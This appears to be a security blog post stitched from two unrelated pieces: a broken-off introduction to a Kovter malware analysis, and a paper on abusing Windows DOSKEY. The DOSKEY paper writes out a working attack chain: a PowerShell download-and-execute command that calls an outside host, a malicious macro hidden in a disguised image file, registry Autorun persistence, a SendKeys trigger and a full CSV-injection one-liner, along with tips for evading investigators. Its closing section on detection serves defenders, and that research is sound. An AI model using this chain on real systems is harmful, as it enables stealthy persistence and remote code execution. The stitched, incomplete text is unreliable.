​Today we are going to talk about analysing the Kovter malware. For those unfamiliar with Kovter, it gained fame in 2015 for being one of the more prominent attacks which utilised living of the land attacks.  Before we begin, there are several concepts which must be explained

1) living off the land – Living off the land refers to using native or signed scripts/binaries to further an attackers goal 

2) Sysmon – Sysmon refers to a tool created by Microsoft which enhances Microsoft wineventlog by providing addition logging based on event codes. It also allows for the customisation as it can ingests a XML with custom command which can monitor select files/ports as shown below 
​

Lab Setup
​

As you can see, the fields all appear to have data in the fields. However clicking on the value htavir (probably after hta virus, why though?) shows no data. In fact clicking and attempting to edit the box failed. After dumping the registry hive to disk and analysing, I believe the issue is this highlighted below:​

As the world becomes further and further connected, the risk of cyber-attacks increases. Cyber criminals are creating malware at a record rate previously unseen before. They are also creating more ingenious methods of code execution to help increase their criminal activities, both in size and sophistication. This paper will detail a new method of using the Windows command “DOSKEY” for code execution. It will also present methods of detecting and mitigating such attacks.
DOSKEY is a DOS utility within Microsoft Windows which adds additional features to command line processors. It was introduced in the summer of 1991 and has been present in every variation of Windows since.
​
Usage (Microsoft, 2017)
doskey [/reinstall] [/listsize=<Size>] [/macros:[all | <ExeName>] [/history] [/insert | /overstrike] [/exename=<ExeName>] [/macrofile=<FileName>] [<MacroName>=[<Text>]]
 
Parameter
Description
/reinstall
Installs a new copy of DOSKEY.exe and clears the command history buffer.

/listsize=<Size>
Specifies the maximum number of commands in the history buffer.

/macros
Displays a list of all DOSKEY macros. You can use the redirection symbol (>) with /macros to redirect the list to a file. You can abbreviate /macros to /m.

/macros:all
Displays DOSKEY macros for all executables.

/macros:<ExeName>
Displays DOSKEY macros for the executable specified by ExeName.

/history
Displays all commands that are stored in memory. You can use the redirection symbol (>) with /history to redirect the list to a file. You can abbreviate /history as /h.

[/insert
/overstrike]

/exename=<ExeName>
Specifies the program (that is, executable) in which the doskey macro runs.

/macrofile=<FileName>
Specifies a file that contains the macros that you want to install.

<MacroName>=[]
Creates a macro that carries out the commands specified by Text. MacroName specifies the name you want to assign to the macro. Text specifies the commands you want to record. If Text is left blank, MacroName is cleared of any assigned commands.

/?
Displays help at the command prompt.


The main use of DOSKEY was the creation of aliases (MACRO defintions). It was widely used by those who primarily worked on Linux systems but had difficulty adjusting to the limited commands of cmd.exe. However since the inception of powershell, its use and importance has decreased. The figure below shows one use. It demonstrates the assigning of “ls” to “dir”.
​

​DOSKEY’s most interesting ability is that it allows for code and .exe execution. Simply assigning an alias to an executable file allows for file execution as shown by the image below. This is the primary feature of DOSKEY which we will be abusing throughout this paper.
​

DOSKEY also has the capacity to load MACRO definitions from files. If many macros are written within a text file, the macros can be loaded directly into cmd.exe instead of loading them manually one by one, as shown in previous figures. For example, imagine a text file with the following:
LS = DIR
T = TREE
PS = POWERSHELL
 
Rather than having to manually type these macros out every time CMD is opened, the user could simply load the entire text file with the following command:
DOSKEY /macrofile=C:\Users\User\Desktop\test.txt
However, it is important to note DOSKEY loading of macro file is not limited to text files. In fact, DOKSEY can load MACRO’s from virtually any file, if it can read into it. DOSKEY can load MACRO’s from the following files:
Text files
HTML files
.SYS files
Word files
Excel files
.EXE files
 
It is likely DOSKEY could read into other files, but these are the files which will are known and will be focusing on.
​

Using DOSKEY for malicious purposes is quite simple. It abuses the Code Execution and Macro Loading capability built into it.
The first step would be assigning a character to a malicious action. In this situation it will be the following PowerShell string:

Powershell(new-object System.Net.WebClient).Downloadfile('http://www.pdf995.com/samples/pdf.pdf', 'C:\Users\Amar\Desktop\test.pdf') ; cmd /c 'C:\Users\Amar\Desktop\test.pdf'

This PowerShell command will download a file from a remote server and execute it. This is a tactic used extensively by attackers and the purpose of using this string, is to replicate the attacks utilized by malware without damaging our system. NOTE: The string itself is not malicious and only serves to mimic the downloading and executing of a remote file.
We will assign the full stop character (“.”) to this string. The reason being is that this character is unlikely to create suspicion. This will be hidden within a jpg file called legit.jpg
Our malicious MACRO definition now looks like this:

.=Powershell(new-object System.Net.WebClient).Downloadfile('http://www.pdf995.com/samples/pdf.pdf', 'C:\Users\Amar\Desktop\test.pdf') ; cmd /c 'C:\Users\Amar\Desktop\test.pdf'

To ensure that legit.jpg is loaded each time command prompt is run, we will need to add it to the registry. This can be done either through regedit or command prompt via the following string:
reg add "HKCU\Software\Microsoft\Command Processor" /v Autorun /d "doskey /macrofile=\"Users\Desktop\legit.jpg\"" /f
This creates the automatic loading of legit.jpg which contains our malicious PowerShell string to the command prompt.
Triggering the malicious character (“.”) relies on using both PowerShell and Windows Script Host’s SendKeys method to input the malicious character triggering the attack. This is done using the following code.

powershell $wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys(""".{ENTER}exit{ENTER}""")

The below string shows the complete one liner to abuse CSV injection.
=cmd|' /C reg add "HKCU\Software\Microsoft\Command Processor" /v Autorun /d "doskey /macrofile="C:\Users\Amar\Desktop\legit.jpg"" /f && start cmd /k powershell $wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys(""".{ENTER}exit{ENTER}""")  '!_xlbgnm.A1

​Simply placing the malicious MACRO definition within a text file would be too easy to locate for a forensic investigator. However, due to the DOSKEY’s ability to load definitions from any file it can read into, we can better disguise our malicious string. One place to start is with HTML files. Placing a malicious string within a normal looking HTML file filled with code could prove time consuming for investigators to analyse. However, this presents the problem of “invalid macro definition”. Everything which is placed within the file would be loaded by DOSKEY and when this does not conform to the correct criteria of creating a macro, “invalid macro definition” appears. This is shown in the screen shot below.
​

​DOSKEY proceeds to load the MACRO definitions from the MACRO file. However, it presents several instances of “invalid macro definition”. While this does not stop execution it is not stealthy.
To combat this, there must be no invalid macro definitions. To do so, we must look at the criteria needed to declare a macro definition.

<MacroName>=[]
Creates a macro that carries out the commands specified by Text. MacroName specifies the name you want to assign to the macro. Text specifies the commands you want to record. If Text is left blank, MacroName is cleared of any assigned commands. (Microsoft, 2017)

All that is needed is to add an “equals” sign to declare a macro definition. This will take all code (which is obscuring the Malicious string) and turn it into a macro definition. This will remove the “invalid macro definition” alert which could alert an investigator to our presence. An example of this is the screenshot below which demonstrates this method.

​Furthermore, the screenshot below demonstrates once the attack is executed there are no longer any invalid macro definitions resulting in a much more stealthier attack. We can see that instead the attack enters the full stop and would launch the malware without any problems.

​Once the issue of invalid macro definitions has been resolved, any file type which DOSKEY can be read into, can be used to host the malicious string.

There are several approaches which can be pursued to defend against such attacks. The first would be to check the registry path HKCU\Software\Microsoft\Command Processor. This would be to see if command prompt is automatically loading a DOSKEY MACRO file. However, this by itself may not be sufficient as attackers may find alternative ways to automatically load MACRO files.

​Another method could be to use “DOSKEY /m”. This would reveal any macros which would have been loaded into cmd.exe. This may be the best method as there is very little attackers can do to defend against this kind of analysis. However even this presents problems. If many macros have been loaded, finding the malware can prove quite difficult, especially if binary data has been loaded to obscure the macro as shown below.

​On the other hand, investigators can use DOSKEY /m > log.txt to create a file to analyse. While this may not completely fix the obfuscation problem, it can help with analysis.
DOSKEY also offers a “/h” parameter which shows the history of the current session. If researchers are able to persist this across all and any sessions, they could see every command entered into cmd.exe. However, attackers could defeat this by using command “DOSKEY /listsize=1”. This would limit the history kept by DOSKEY to just one command, which would always be “DOSKEY /h”. While “/h” can be a useful forensic tool, it should not be heavily relied upon.
Other indicators of abuse could be a change of binary data of the file. Files which have had their binary data tampered with will not open correctly and would be indicative of being changed/altered. Furthermore, these files should be analysed under a hex editor to determine if they contain a malicious MACRO definition or not as shown below.
​

​DOSKEY may not be the most sophisticated method of attack which can be used. In fact, there are many other methods which are much more effective and less intrusive on the network. However, the awkwardness and ambiguity of DOSKEY abuse could provide problems for investigators and another method for attackers to further infiltrate systems, especially considering that DOSKEY is installed by default on every version of windows since MS DOS 5.0 and is relatively ignored.
DOSKEY abuse follows the trend set by attackers of using many little instances which seem individually innocent, but together create a much more malicious picture. The VB script entering a character to cmd may not seem inherently malicious, and a file which does not trigger antivirus may seem innocent, but when placed together they can allow attackers to achieve persistence on a system and push further into the network.